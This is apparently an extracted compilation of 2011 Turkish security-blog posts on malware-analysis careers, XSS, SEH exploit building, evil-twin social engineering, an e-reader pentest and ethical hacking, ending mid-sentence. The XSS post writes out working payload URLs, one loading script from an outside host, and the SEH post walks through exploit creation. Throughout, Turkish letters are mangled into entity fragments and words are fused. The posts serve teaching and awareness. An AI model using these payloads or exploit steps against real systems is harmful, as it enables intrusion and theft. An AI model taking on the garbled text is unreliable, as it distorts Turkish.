Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

